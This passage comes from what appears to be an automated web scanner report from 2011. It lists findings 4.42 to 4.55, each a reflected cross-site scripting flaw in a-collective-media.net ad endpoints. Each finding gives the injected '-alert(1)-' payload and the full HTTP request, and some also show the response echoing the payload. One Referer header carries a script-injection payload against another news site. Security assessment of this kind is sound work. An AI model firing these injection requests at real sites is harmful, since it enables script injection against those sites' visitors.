Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.42. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4d2bf'-alert(1)-'4f7eb27d456 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/uol.collective/ColeHaan_MM_Openness_CMN_131094d2bf'-alert(1)-'4f7eb27d456;dcove=o;sz=300x250;click0=;ord=1655200? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.43. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfb42'-alert(1)-'55062673759 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;click0=;ord=1655200?bfb42'-alert(1)-'55062673759 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.44. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cce9e'-alert(1)-'f72cf659efc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/uol.collective/ColeHaan_MM_Openness_CMN_13109;dcove=o;sz=300x250;click0=;ord=1655200?&cce9e'-alert(1)-'f72cf659efc=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

4.45. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de957'-alert(1)-'86a9ffedd71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjde957'-alert(1)-'86a9ffedd71/bzo.847.CD39C435/ATF;sz=728x90;net=bzo;ord=1296226792127; HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7406
Date: Fri, 28 Jan 2011 16:37:20 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-86809834_1296232640","http://ad.doubleclick.net/adjde957'-alert(1)-'86a9ffedd71/bzo.847.CD39C435/ATF;net=bzo;u=,bzo-86809834_1296232640,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;cmw=nur
...[SNIP]...

4.46. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79ae7'-alert(1)-'f6babba3ff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.847.CD39C43579ae7'-alert(1)-'f6babba3ff1/ATF HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Date: Fri, 28 Jan 2011 16:37:19 GMT
Content-Length: 7355
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-23828810_1296232639","http://ad.doubleclick.net//bzo.847.CD39C43579ae7'-alert(1)-'f6babba3ff1/ATF;net=bzo;u=,bzo-23828810_1296232639,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.
...[SNIP]...

4.47. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28bed'-alert(1)-'6aa23ec8461 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.847.CD39C435/ATF28bed'-alert(1)-'6aa23ec8461 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7355
Date: Fri, 28 Jan 2011 16:37:20 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("bzo-67058863_1296232640","http://ad.doubleclick.net//bzo.847.CD39C435/ATF28bed'-alert(1)-'6aa23ec8461;net=bzo;u=,bzo-67058863_1296232640,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;contx=none;dc=w;btg=bzo.spor
...[SNIP]...

4.48. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.847.CD39C435/ATF

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdbf4'-alert(1)-'424982c1ee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.847.CD39C435/ATF?bdbf4'-alert(1)-'424982c1ee6=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

4.49. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/bzo.847.CD39C435/ATF

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ff88'-alert(1)-'0d4cdd2d236 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/bzo.847.CD39C435/ATF;sz=3ff88'-alert(1)-'0d4cdd2d236 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 16:37:18 GMT
Connection: close
Content-Length: 7388

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
/adj/bzo.847.CD39C435/ATF;net=bzo;u=,bzo-77437619_1296232638,11d765b6a10b1b3,none,bzo.sports_l-bzo.c9q-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l;;sz=3ff88'-alert(1)-'0d4cdd2d236;contx=none;dc=w;btg=bzo.sports_l;btg=bzo.c9q;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.sports_h;btg=cm.weath_l?","3ff88'-alert(1)-'0d4cd
...[SNIP]...

4.50. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c29a3'-alert(1)-'a7c73f96421 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadjc29a3'-alert(1)-'a7c73f96421/iblocal.revinet.bostonherald/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:34 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:34 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:34 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:34 GMT
Content-Length: 8164

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-22784626_1296266074","http://ad.doubleclick.net/adjc29a3'-alert(1)-'a7c73f96421/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-22784626_1296266074,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-
...[SNIP]...

4.51. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a69b'-alert(1)-'5df7ba57f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.revinet.bostonherald4a69b'-alert(1)-'5df7ba57f4/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:35 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:35 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:35 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:35 GMT
Content-Length: 8155

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-54069803_1296266075","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald4a69b'-alert(1)-'5df7ba57f4/audience;net=iblocal;u=,iblocal-54069803_1296266075,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports
...[SNIP]...

4.52. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c1e1'-alert(1)-'5c79f4e4b95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.revinet.bostonherald/audience3c1e1'-alert(1)-'5c79f4e4b95;sz=300x250;net=iblocal;ord=0.9691057777963579;env=ifr;ord1=80394;cmpgurl=http%253A//www.bostonherald.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:36 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:36 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:36 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:36 GMT
Content-Length: 8156

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("iblocal-25417174_1296266076","http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience3c1e1'-alert(1)-'5c79f4e4b95;net=iblocal;u=,iblocal-25417174_1296266076,11d765b6a10b1b3,Miscellaneous,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.wea
...[SNIP]...

4.53. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50801'-alert(1)-'61d025e556e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.revinet.bostonherald/audience?50801'-alert(1)-'61d025e556e=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

4.54. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/iblocal.revinet.bostonherald/audience

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8835d'-alert(1)-'23dd9848d70 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/iblocal.revinet.bostonherald/audience;sz=8835d'-alert(1)-'23dd9848d70 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:54:26 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Sat, 29-Jan-2011 09:54:26 GMT
Set-Cookie: qcdp=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:54:26 GMT
Content-Length: 8099

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
cal;u=,iblocal-53332311_1296266066,11d765b6a10b1b3,none,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h;;sz=8835d'-alert(1)-'23dd9848d70;contx=none;dc=w;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;
...[SNIP]...

4.55. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/cmadj/q1.bosherald/be_ent

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39f09'-alert(1)-'5901c85919a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj39f09'-alert(1)-'5901c85919a/q1.bosherald/be_ent;sz=300x250;net=q1;ord=2134060438?;env=ifr;ord1=204282;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
